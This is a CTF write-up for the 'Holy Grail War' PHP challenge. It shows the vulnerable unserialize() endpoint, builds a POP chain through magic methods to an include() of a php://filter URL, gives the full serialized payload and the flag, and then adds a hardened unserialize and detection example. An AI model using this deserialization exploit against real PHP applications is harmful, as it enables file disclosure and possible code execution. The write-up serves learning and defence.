WEB:
Holy Grail War !!! (writeup by: 结局别说遗憾 Zn.)

Approach: open the challenge link; the code is as follows:

<?php
highlight_file(__FILE__);
error_reporting(0);
class artifact{
    public $excalibuer;
    public $arrow;
    public function __toString(){
        echo "为Saber选择了对的武器!<br>";
        return $this->excalibuer->arrow;
    }
}
class prepare{
    public $release;
    public function __get($key){
        $functioin = $this->release;
        echo "蓄力!咖喱棒!!<br>";
        return $functioin();
    }
}
class saber{
    public $weapon;
    public function __invoke(){
        echo "胜利!<br>";
        include($this->weapon);
    }
}
class summon{
    public $Saber;
    public $Rider;
    public function __wakeup(){
        echo "开始召唤从者!<br>";
        echo $this->Saber;
    }
}
if(isset($_GET['payload'])){
    unserialize($_GET['payload']);
}
?>
The code shows that this challenge again tests constructing a PHP deserialization POP chain. Its four magic methods fire in this order:
1. __wakeup() fires automatically when an object is unserialized
2. __toString() fires when an object is used as a string
3. __get($key) is called when a non-existent property of prepare is accessed
4. __invoke() fires when a saber instance is called as a function

Now build the POP chain:
<?php
highlight_file(__FILE__);
error_reporting(0);
class artifact{
    public $excalibuer;
    public $arrow;
    public function __construct()
    {
        $this->excalibuer = new prepare();
    }
}
class prepare{
    public $release;
}
class saber{
    public $weapon = 'php://filter/convert.base64-encode/resource=flag.php'; // specify the filter and read flag.php
}
class summon{
    public $Saber;
    public $Rider;
}
$a = new summon();
$a->Saber = new artifact();
$a->Saber->excalibuer->release = new saber();
echo urldecode(serialize($a));
?>
Run it to get the serialized POP chain:

O:6:"summon":2:{s:5:"Saber";O:8:"artifact":2:{s:10:"excalibuer";O:7:"prepare":1:{s:7:"release";O:5:"saber":1:{s:6:"weapon";s:52:"php://filter/convert.base64-encode/resource=flag.php";}}s:5:"arrow";N;}s:5:"Rider";N;}

Pass it as the GET parameter with HackBar and the page returns:

Base64-decode the returned string to get the flag:
ISCTF{9b2fef42-d7ea-4ce0-8d17-388a15e46949}
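As an added example (not from the original writeup or the challenge), here is the same unserialize() sink with the mitigation that stops this chain: passing allowed_classes => false makes every O: token deserialize to __PHP_Incomplete_Class, so __wakeup() never runs and none of the following magic methods can fire. The class bodies are trimmed copies of the challenge classes, the payload is constructed to match the chain above with a placeholder path in place of the php://filter URL, and the helper names safe_unserialize and serialized_object_classes are my own. Assumes PHP 7.0 or later (when the allowed_classes option was added).

```php
<?php
// Added example: hardened unserialize() sink plus a pre-check on the payload.
// Class bodies are trimmed copies of the challenge classes (same chain shape).
class artifact { public $excalibuer; public $arrow;
    public function __toString() { return $this->excalibuer->arrow; } }
class prepare { public $release;
    public function __get($key) { $f = $this->release; return $f(); } }
class saber { public $weapon;
    public function __invoke() { include($this->weapon); } }
class summon { public $Saber; public $Rider;
    public function __wakeup() { echo $this->Saber; } }

// 1. Mitigation: refuse to instantiate any class while unserializing.
//    Every O:<len>:"<class>": becomes __PHP_Incomplete_Class, whose magic
//    methods are never called, so the chain cannot start.
function safe_unserialize(string $data)
{
    return unserialize($data, ['allowed_classes' => false]);
}

// 2. Detection: list the class names a serialized string would instantiate.
//    A payload that should only carry scalars/arrays must return [] here.
function serialized_object_classes(string $data): array
{
    preg_match_all('/O:\d+:"([^"]+)":/', $data, $m);
    return $m[1];
}

// Constructed payload with the same nesting as the writeup's chain;
// "/tmp/anything" is a placeholder, not the challenge's filter URL.
$payload = 'O:6:"summon":2:{s:5:"Saber";O:8:"artifact":2:{s:10:"excalibuer";'
         . 'O:7:"prepare":1:{s:7:"release";O:5:"saber":1:{s:6:"weapon";'
         . 's:13:"/tmp/anything";}}s:5:"arrow";N;}s:5:"Rider";N;}';

$classes = serialized_object_classes($payload);
if ($classes !== []) {
    // Log and treat as hostile: summon, artifact, prepare, saber
    error_log('rejected serialized payload instantiating: ' . implode(',', $classes));
}

$obj = safe_unserialize($payload);
// The outer object is an incomplete class, so __wakeup() did not run and
// nothing was echoed or included.
var_dump($obj instanceof __PHP_Incomplete_Class); // bool(true)
?>
```

If the endpoint only needs scalars or arrays, the stronger fix is to not expose unserialize() to user input at all and use json_decode() instead, which cannot instantiate classes; where native serialization is unavoidable, allowed_classes should be an explicit whitelist of plain data classes without magic methods.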
From: https://www.cnblogs.com/IWaits/p/17922145.html